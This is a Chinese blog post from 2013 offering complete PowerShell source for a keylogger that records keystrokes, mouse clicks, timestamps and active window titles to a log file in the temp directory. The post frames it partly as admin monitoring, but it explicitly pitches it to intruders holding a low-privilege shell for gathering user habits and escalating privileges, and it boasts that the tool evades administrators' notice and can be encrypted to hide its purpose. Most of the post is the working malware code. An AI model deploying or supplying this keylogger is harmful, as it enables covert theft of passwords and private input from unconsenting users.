PowerShell定時記錄作業系統行為

@天行健中國元素發表於2013-10-05

     作為系統管理員,有些時候是需要記錄系統中的其他使用者的一些操作行為的,例如:當系統管理員懷疑係統存在漏洞,且已經有被植入後門或者建立隱藏賬戶時,就需要對曾經登陸的使用者進行監控,儲存其開啟或者操作過的檔案。或者在另外一個場景,當黑客拿下一個普通許可權的shell之後,想看看最近有哪些使用者登陸過,操作過什麼,以便根據使用者習慣採取進一步行動獲取更高許可權,這個時候記錄使用者行為就顯得很重要了。

      可能有讀者覺得此時安裝個監控軟體不就行了麼,拜託,你入侵別人的系統,你裝個監控軟體,你把管理員試做無物麼?這個時候PowerShell這個vista及其之後Windows作業系統都自帶的強大的命令列就有了用處,系統自帶,不會被管理員發現異常,指令碼不用編譯,如果指令碼內容再加個密,他們更猜不出是幹什麼用的,嘿嘿。如果要記錄幾個特性用於記錄啥時候幹了什麼,無非要記錄的有幾樣內容:操作,哪個檔案或程式,時間。有這幾個特點就基本上可以掌握使用者的操作習慣了。

      程式碼不算太難就不逐句解釋了,有啥問題的讀者可以給我留言詢問,基本上關鍵語句都有註釋的。程式碼如下:

function Get-TimedOperationRecord {
<#
    Author:fuhj(powershell#live.cn ,http://fuhaijun.com) 
    Logs keys pressed, time and the active window.
.Parameter LogPath
    Specifies the path where pressed key details will be logged. By default, keystroke are logged to '$($Env:TEMP)\key.log'.
.Parameter CollectionInterval
    Specifies the interval in minutes to capture keystrokes. By default, keystroke are captured indefinitely.
.Example
    Get-TimedOperationRecord -LogPath C:\key.log
.Example
    Get-TimedOperationRecord -CollectionInterval 20
#>
    [CmdletBinding()] Param (
        [Parameter(Position = 0)]
        [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent $_)) -PathType Container})]
        [String]
        $LogPath = "$($Env:TEMP)\key.log",

        [Parameter(Position = 1)]
        [UInt32]
        $CollectionInterval
    )

    $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath)

    Write-Verbose "Logging keystrokes to $LogPath"

    $Initilizer = {
        $LogPath = 'REPLACEME'

        '"TypedKey","Time","WindowTitle"' | Out-File -FilePath $LogPath -Encoding unicode

        function KeyLog {
            [Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null

            try
            {
                $ImportDll = [User32]
            }
            catch
            {
                $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
                $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
                $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
                $TypeBuilder = $ModuleBuilder.DefineType('User32', 'Public, Class')

                $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
                $FieldArray = [Reflection.FieldInfo[]] @(
                    [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
                    [Runtime.InteropServices.DllImportAttribute].GetField('ExactSpelling'),
                    [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError'),
                    [Runtime.InteropServices.DllImportAttribute].GetField('PreserveSig'),
                    [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
                    [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
                )

                $PInvokeMethod = $TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))
                $FieldValueArray = [Object[]] @(
                    'GetAsyncKeyState',
                    $True,
                    $False,
                    $True,
                    [Runtime.InteropServices.CallingConvention]::Winapi,
                    [Runtime.InteropServices.CharSet]::Auto
                )
                $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
                $PInvokeMethod.SetCustomAttribute($CustomAttribute)

                $PInvokeMethod = $TypeBuilder.DefineMethod('GetKeyboardState', 'Public, Static', [Int32], [Type[]] @([Byte[]]))
                $FieldValueArray = [Object[]] @(
                    'GetKeyboardState',
                    $True,
                    $False,
                    $True,
                    [Runtime.InteropServices.CallingConvention]::Winapi,
                    [Runtime.InteropServices.CharSet]::Auto
                )
                $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
                $PInvokeMethod.SetCustomAttribute($CustomAttribute)

                $PInvokeMethod = $TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))
                $FieldValueArray = [Object[]] @(
                    'MapVirtualKey',
                    $False,
                    $False,
                    $True,
                    [Runtime.InteropServices.CallingConvention]::Winapi,
                    [Runtime.InteropServices.CharSet]::Auto
                )
                $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
                $PInvokeMethod.SetCustomAttribute($CustomAttribute)

                $PInvokeMethod = $TypeBuilder.DefineMethod('ToUnicode', 'Public, Static', [Int32],
                    [Type[]] @([UInt32], [UInt32], [Byte[]], [Text.StringBuilder], [Int32], [UInt32]))
                $FieldValueArray = [Object[]] @(
                    'ToUnicode',
                    $False,
                    $False,
                    $True,
                    [Runtime.InteropServices.CallingConvention]::Winapi,
                    [Runtime.InteropServices.CharSet]::Auto
                )
                $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
                $PInvokeMethod.SetCustomAttribute($CustomAttribute)

                $PInvokeMethod = $TypeBuilder.DefineMethod('GetForegroundWindow', 'Public, Static', [IntPtr], [Type[]] @())
                $FieldValueArray = [Object[]] @(
                    'GetForegroundWindow',
                    $True,
                    $False,
                    $True,
                    [Runtime.InteropServices.CallingConvention]::Winapi,
                    [Runtime.InteropServices.CharSet]::Auto
                )
                $CustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor, @('user32.dll'), $FieldArray, $FieldValueArray)
                $PInvokeMethod.SetCustomAttribute($CustomAttribute)

                $ImportDll = $TypeBuilder.CreateType()
            }

            Start-Sleep -Milliseconds 40

                try
                {

                    #loop through typeable characters to see which is pressed
                    for ($TypeableChar = 1; $TypeableChar -le 254; $TypeableChar++)
                    {
                        $VirtualKey = $TypeableChar
                        $KeyResult = $ImportDll::GetAsyncKeyState($VirtualKey)

                        #if the key is pressed
                        if (($KeyResult -band 0x8000) -eq 0x8000)
                        {

                            #check for keys not mapped by virtual keyboard
                            $LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000
                            $RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000
                            $LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000
                            $RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq 0x8000
                            $LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000
                            $RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000
                            $TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000
                            $SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000
                            $DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000
                            $EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000
                            $BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000
                            $LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000
                            $RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000
                            $UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000
                            $DownArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000
                            $LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000
                            $RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000

                            if ($LeftShift -or $RightShift) {$LogOutput += '[Shift]'}
                            if ($LeftCtrl  -or $RightCtrl)  {$LogOutput += '[Ctrl]'}
                            if ($LeftAlt   -or $RightAlt)   {$LogOutput += '[Alt]'}
                            if ($TabKey)       {$LogOutput += '[Tab]'}
                            if ($SpaceBar)     {$LogOutput += '[SpaceBar]'}
                            if ($DeleteKey)    {$LogOutput += '[Delete]'}
                            if ($EnterKey)     {$LogOutput += '[Enter]'}
                            if ($BackSpaceKey) {$LogOutput += '[Backspace]'}
                            if ($LeftArrow)    {$LogOutput += '[Left Arrow]'}
                            if ($RightArrow)   {$LogOutput += '[Right Arrow]'}
                            if ($UpArrow)      {$LogOutput += '[Up Arrow]'}
                            if ($DownArrow)    {$LogOutput += '[Down Arrow]'}
                            if ($LeftMouse)    {$LogOutput += '[Left Mouse]'}
                            if ($RightMouse)   {$LogOutput += '[Right Mouse]'}

                            #check for capslock
                            if ([Console]::CapsLock) {$LogOutput += '[Caps Lock]'}

                            $MappedKey = $ImportDll::MapVirtualKey($VirtualKey, 3)
                            $KeyboardState = New-Object Byte[] 256
                            $CheckKeyboardState = $ImportDll::GetKeyboardState($KeyboardState)

                            #create a stringbuilder object
                            $StringBuilder = New-Object -TypeName System.Text.StringBuilder;
                            $UnicodeKey = $ImportDll::ToUnicode($VirtualKey, $MappedKey, $KeyboardState, $StringBuilder, $StringBuilder.Capacity, 0)

                            #convert typed characters
                            if ($UnicodeKey -gt 0) {
                                $TypedCharacter = $StringBuilder.ToString()
                                $LogOutput += ('['+ $TypedCharacter +']')
                            }

                            #get the title of the foreground window
                            $TopWindow = $ImportDll::GetForegroundWindow()
                            $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle

                            #get the current DTG
                            $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)

                            #Create a custom object to store results
                            $ObjectProperties = @{'Key Typed' = $LogOutput;
                                                  'Window Title' = $WindowTitle;
                                                  'Time' = $TimeStamp}
                            $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
                            $CSVEntry = ($ResultsObject | ConvertTo-Csv -NoTypeInformation)[1]
                            #return results
                            Out-File -FilePath $LogPath -Append -InputObject $CSVEntry -Encoding unicode

                        }
                    }
                }
                catch {}
            }
        }

    $Initilizer = [ScriptBlock]::Create(($Initilizer -replace 'REPLACEME', $LogPath))

    Start-Job -InitializationScript $Initilizer -ScriptBlock {for (;;) {Keylog}} -Name Keylogger | Out-Null

    if ($PSBoundParameters['CollectionInterval'])
    {
        $Timer = New-Object Timers.Timer($CollectionInterval * 60 * 1000)

        Register-ObjectEvent -InputObject $Timer -EventName Elapsed -SourceIdentifier ElapsedAction -Action {
            Stop-Job -Name Keylogger
            Unregister-Event -SourceIdentifier ElapsedAction
            $Sender.Stop()
        } | Out-Null
    }
}
View Code

執行方式如下圖所示:2013-10-05_224047

執行效果,會在指定的目錄裡生成log檔案,內容如下圖所示:

image

能夠看到裡面相關的擊鍵動作,有興趣的讀者可以猜一下,這段被記錄的操作都幹了什麼,期間騰訊還推了一次彈窗新聞,無恥啊。

作者: 付海軍
出處:http://fuhj02.cnblogs.com
版權:本文版權歸作者和部落格園共有
轉載:歡迎轉載,為了儲存作者的創作熱情,請按要求【轉載】,謝謝
要求:未經作者同意,必須保留此段宣告;必須在文章中給出原文連線且保證內容完整!否則必究法律責任!
個人網站: http://www.fuhaijun.com/

相關文章